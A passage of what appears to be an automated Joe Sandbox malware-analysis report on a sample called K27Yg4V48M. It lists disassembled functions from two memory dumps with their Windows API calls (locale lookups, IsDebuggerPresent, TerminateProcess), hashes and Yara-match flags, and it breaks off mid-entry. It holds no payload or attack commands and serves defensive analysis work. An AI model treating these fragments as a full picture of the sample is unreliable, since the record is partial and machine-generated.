                                                                                                    • Instruction ID: 5878ab0ba0ff803318381d1d3d0f630b8e9e73028367fb736018e699be90aabd
                                                                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                    • Instruction Fuzzy Hash: 8B518471944209AFEF22DFA5DC40ABEB7BAEF14708F050529E914E7190FB719B02CB61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: C$C
                                                                                                    • API String ID: 0-238425240
                                                                                                    • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                    • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                    • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                    • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2444527052-0
                                                                                                    • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                    • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                    • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                    • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02130A23,?,?,?,?,0213047A,?,00000004), ref: 0213B353
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0213B3E3
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0213B3F1
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02130A23,00000000,02130B43), ref: 0213B494
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2444527052-0
                                                                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                    • Instruction ID: 712429ca153e757c6e040279a1ff8ee01a4e6eec28e798dcff4735f8bbf07e04
                                                                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                    • Instruction Fuzzy Hash: 6D61FA71684206AEDB26AB35CC41BBB77AFEF04718F144429ED06DB180FB74E640CBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorInfoLastLocale$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2834031935-0
                                                                                                    • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                    • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                    • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                    • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                    • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                    • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                    • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0210DAD7), ref: 0212A732
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0210DAD7), ref: 0212A73C
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0210DAD7), ref: 0212A749
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                    • Instruction ID: daef61acefb62abb1ccd49e7aeb4f4a915158e9faa43ab2c8fd67ca46f55c6f9
                                                                                                    • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                    • Instruction Fuzzy Hash: B331C77494132C9BCB21DF64DD8879CBBB8BF08710F5041EAE80CA7290E7749B958F44
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                    • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,0213009C,00000000,00457970,0000000C,021301F3,00000000,00000002,00000000), ref: 021300E7
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0213009C,00000000,00457970,0000000C,021301F3,00000000,00000002,00000000), ref: 021300EE
                                                                                                    • ExitProcess.KERNEL32 ref: 02130100
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction ID: c434ffbd3f8292266d72df80c9fa3c0c6f1cfee55d247bed4ce8daf66d90586e
                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction Fuzzy Hash: B9E0B635084148AFCF126F54DD08A593BABEB4AB86B504028F9059B531CB36DA42DA44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .$GetProcAddress.$l
                                                                                                    • API String ID: 0-2784972518
                                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                    • Instruction ID: 8d3964254565dfb7a40da2e234806515813b4f54de45dc01fec139ea16ba0e7d
                                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                    • Instruction Fuzzy Hash: 573148B6900609DFDB10CF99C880BAEBBF9FF48324F15404AD845A7250D7B1EA45CBA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2043925204
                                                                                                    • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                    • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                    • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                    • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2043925204
                                                                                                    • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                    • Instruction ID: ca13e8a8cc6607b58f4d4016ffb78c8873f60d5e2f976b9fae1d899b5e00db9b
                                                                                                    • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                    • Instruction Fuzzy Hash: D7413672940219AFCB209FB9CC88EAB77BAEF80714F104268F905DB180E7319D41CB50
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                    • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                    • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                    • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                    • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                    • Instruction ID: a309c272f1674a4294387a155ce312671d0c67ddf92c471c450dfaaf4a7b0375
                                                                                                    • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                    • Instruction Fuzzy Hash: D5023C71E402299FDF14CFA9C8906ADBBF2FF48314F258169E819E7380D731A956CB84
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0210262C
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 021027CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4264772764-0
                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction ID: 936728ad77630097e08e491b79978368e974daad8bbe70652992c86637dc7f7e
                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction Fuzzy Hash: 1D414F25A64384A5E730FFA4BC45B2533B0FF64726F10252BE528CB2B2E3B28540C75E
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02136F21,?,?,00000008,?,?,0213F3E2,00000000), ref: 02137153
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction ID: 9c22394c0ff2f618f2d80adf6b736601bb0000965880fadfa979901567ede78d
                                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction Fuzzy Hash: 31B16F72250609DFD71ACF28C486B65BBE2FF45368F258658E899CF2E5C335D982CB40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2955987475-0
                                                                                                    • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                    • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                    • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                    • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 021321A0
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321AD
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0213B900
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2955987475-0
                                                                                                    • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                    • Instruction ID: 5f4ddfa5237dbbaf3707f0d0f2ecf7c9d9e2ca151928c4748e55b13afe88a007
                                                                                                    • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                    • Instruction Fuzzy Hash: A621A77259420AAFDF25AF24DC41BBA77AEEF04728F10017AED01D6150FB75DA44CB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                    • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                    • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                    • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02130A1C,?,0213BC89,00000000,?,?,?), ref: 0213B5A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                    • Instruction ID: 3c694ae53e431c9da6daa793367b114572838543cfa1d1d540b7d77ce734b3a9
                                                                                                    • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                    • Instruction Fuzzy Hash: 85114C3B2047055FDB189F39C89177ABB93FF84318B14442CD94687640E371B602CB40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 787680540-0
                                                                                                    • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                    • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                    • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                    • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0213B87A,00000000,00000000,?), ref: 0213BB08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 787680540-0
                                                                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                    • Instruction ID: b6b665da43f4a10a234628bf718e7762877bde7ed31f9ff0223e3908cbf6171c
                                                                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                    • Instruction Fuzzy Hash: EDF0F932A841156BDB395A25CC45BFA776AEB4071CF050469DC45B3148FF74BF01C6D0
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
